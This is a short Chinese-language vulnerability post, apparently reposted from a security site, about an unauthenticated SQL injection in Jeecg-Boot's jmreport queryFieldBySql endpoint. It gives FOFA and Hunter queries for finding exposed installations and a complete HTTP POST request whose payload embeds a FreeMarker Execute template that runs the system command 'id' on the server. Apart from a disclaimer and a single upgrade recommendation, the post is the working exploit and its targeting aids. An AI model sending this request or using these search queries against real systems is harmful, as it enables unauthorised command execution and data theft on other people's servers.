赞
踩
文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Jeecg-Boot中存在SQL注入漏洞,远程未授权攻击者可通过report/jeecgboot/jmreport/queryFieldBySql端点来执行任意SQL语句,最终可能导致敏感信息泄露等。
FOFA:
app="JEECG"
Hunter:
app.name="JeecgBoot"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 58
{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\") }'","dbSource":"","type":"0"}
1、目前官方已发布漏洞修复版本,建议用户升级到安全版本:http://www.jeecg.com/
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。